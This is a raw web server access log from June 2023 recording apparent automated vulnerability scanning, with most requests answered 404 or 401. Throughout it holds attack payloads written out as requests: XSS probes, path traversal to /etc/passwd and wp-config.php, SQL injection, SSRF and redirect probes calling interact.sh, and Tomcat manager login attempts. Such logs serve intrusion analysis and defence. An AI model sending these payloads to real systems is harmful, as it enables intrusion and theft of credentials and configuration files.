107.189.31.184 - - [17/Jun/2023:20:15:16 +0530] "GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:20:15:17 +0530] "GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:20:16:15 +0530] "POST /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:20:16:15 +0530] "POST /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1" 404 1050
41.186.73.134 - - [17/Jun/2023:20:16:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:17:44 +0530] "GET /configuration.yml HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:20:17:46 +0530] "GET /config/configuration.yml HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:20:17:47 +0530] "GET /configuration.yml HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:20:17:49 +0530] "GET /config/configuration.yml HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:20:17:51 +0530] "GET /redmine/config/configuration.yml HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:20:17:58 +0530] "GET /redmine/config/configuration.yml HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:20:18:33 +0530] "GET /api/users/admin/check HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:20:18:34 +0530] "GET /api/users/admin/check HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:20:18:36 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:20:18:37 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:20:18:59 +0530] "GET /src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:20:18:59 +0530] "GET /src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:20:19:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:20:01 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=0&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:20:20:01 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=0&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:20:20:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:23:47 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:20:23:47 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:20:23:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:25:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.60.234.249 - - [17/Jun/2023:20:25:10 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:20:27:02 +0530] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1" 404 1128
107.189.31.184 - - [17/Jun/2023:20:27:03 +0530] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1" 404 1128
107.189.31.184 - - [17/Jun/2023:20:27:19 +0530] "GET /user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2RHotms3oolasmRCARLNIj49lwC')),2-- HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:27:19 +0530] "GET /user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','2RHotms3oolasmRCARLNIj49lwC')),2-- HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:27:55 +0530] "GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:20:27:55 +0530] "GET /sap/public/bc/icf/logoff?redirecturl=https://interact.sh HTTP/1.1" 404 1042
41.186.73.134 - - [17/Jun/2023:20:28:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:28:49 +0530] "GET /environment.rb HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:20:28:50 +0530] "GET /environment.rb HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:20:28:51 +0530] "GET /config/environment.rb HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:20:28:52 +0530] "GET /config/environment.rb HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:20:28:53 +0530] "GET /redmine/config/environment.rb HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:20:28:54 +0530] "GET /redmine/config/environment.rb HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:20:29:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:30:29 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:30:30 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:30:31 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:30:32 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:30:33 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:30:34 +0530] "POST /module/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:20:31:32 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:20:31:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:20:32:12 +0530] "GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 1198
107.189.31.184 - - [17/Jun/2023:20:32:13 +0530] "GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 1198
107.189.31.184 - - [17/Jun/2023:20:32:14 +0530] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 1216
107.189.31.184 - - [17/Jun/2023:20:32:15 +0530] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 1216
41.186.73.134 - - [17/Jun/2023:20:32:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:33:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:34:50 +0530] "GET /installer HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:34:50 +0530] "GET /installer HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:20:36:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:38:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:39:30 +0530] "GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:20:39:31 +0530] "GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:20:41:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:42:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
205.185.115.70 - - [17/Jun/2023:20:42:37 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
198.98.50.108 - - [17/Jun/2023:20:43:18 +0530] "CONNECT myipb1a.mrrage.xyz:80 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:20:44:40 +0530] "GET /admin/airflow/login HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:44:42 +0530] "GET /admin/airflow/login HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:45:29 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:20:45:30 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:20:45:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:45:31 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:20:45:32 +0530] "GET /opc/v1/instance HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:20:46:03 +0530] "GET /debug.seam HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:20:46:03 +0530] "GET /debug.seam HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:20:46:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:47:02 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchagallery HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:47:02 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchagallery HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:47:12 +0530] "GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:47:13 +0530] "GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:47:47 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:20:47:48 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:20:47:50 +0530] "GET /admin/?a=dopara&app_type=shop&c=product_admin&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23&n=product HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:20:47:51 +0530] "GET /admin/?a=dopara&app_type=shop&c=product_admin&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23&n=product HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:20:48:23 +0530] "POST /install.php?page=1 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:20:48:25 +0530] "POST /install.php?page=1 HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:20:49:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
113.200.137.109 - - [17/Jun/2023:20:50:09 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:10 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:10 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:11 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:11 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:12 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:12 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:13 +0530] "GET / HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:20:50:14 +0530] "POST /sess-bin/login_handler.cgi HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:20:50:15 +0530] "POST /sess-bin/login_handler.cgi HTTP/1.1" 404 1046
124.89.86.252 - - [17/Jun/2023:20:50:16 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:17 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:19 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:19 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:20 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:20 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:21 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:21 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:27 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:27 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:28 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:29 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:30 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:30 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:31 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:34 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:39 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:39 +0530] "GET / HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:50:48 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:50:48 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:49 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:49 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:50 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:50 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:51 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:51 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:52 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:52 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:53 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:53 +0530] "GET / HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:50:53 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:20:50:53 +0530] "-" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:54 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:54 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:50:55 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:55 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:50:56 +0530] "GET / HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:50:59 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:20:50:59 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:20:50:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
124.89.86.252 - - [17/Jun/2023:20:50:59 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:00 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:00 +0530] "GET / HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:51:04 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:20:51:04 +0530] "-" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:04 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:04 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:08 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:08 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:12 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:12 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:13 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:13 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:13 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:14 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:14 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:15 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:15 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:16 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:16 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:17 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:17 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:18 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:19 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:19 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:19 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:20 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:20 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:21 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:21 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:22 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:23 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:24 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:24 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:25 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:25 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:27 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:27 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:28 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:28 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:29 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:29 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:30 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:30 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:31 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:31 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:32 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:32 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:33 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:33 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:34 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:35 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:35 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:36 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:36 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:37 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:37 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:38 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:39 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:39 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:41 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:41 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:42 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:42 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:43 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:43 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:44 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:44 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:45 +0530] "GET / HTTP/1.1" 400 -
124.89.86.252 - - [17/Jun/2023:20:51:45 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:46 +0530] "GET / HTTP/1.1" 400 -
113.200.137.109 - - [17/Jun/2023:20:51:46 +0530] "GET / HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:20:52:04 +0530] "POST /xxl-job-admin/login HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:52:05 +0530] "POST /xxl-job-admin/login HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:20:52:06 +0530] "POST /login HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:20:52:07 +0530] "POST /login HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:20:52:07 +0530] "GET /deployment-config.json HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:20:52:07 +0530] "GET /deployment-config.json HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:20:53:48 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_horoscope HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:53:49 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_horoscope HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:20:54:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:55:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:56:17 +0530] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:56:17 +0530] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:57:56 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:20:57:56 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:20:58:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:59:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:59:35 +0530] "GET /autodiscover/autodiscover.json/v1.0/2RHotvRWOdC0cmZvVWCWrxvKHRO@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1" 404 1144
107.189.31.184 - - [17/Jun/2023:20:59:35 +0530] "GET /autodiscover/autodiscover.json/v1.0/2RHotvRWOdC0cmZvVWCWrxvKHRO@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1" 404 1144
41.186.73.134 - - [17/Jun/2023:21:02:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:21:03:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:21:03:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:03:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:07:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:07:16 +0530] "GET /admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:21:07:18 +0530] "GET /admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:21:07:18 +0530] "GET /acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:21:07:21 +0530] "GET /acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1" 404 1054
41.186.73.134 - - [17/Jun/2023:21:08:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:08:19 +0530] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:21:08:19 +0530] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:21:11:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:12:08 +0530] "GET /kustomization.yml HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:21:12:08 +0530] "GET /kustomization.yml HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:21:12:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:14:02 +0530] "GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1" 404 1090
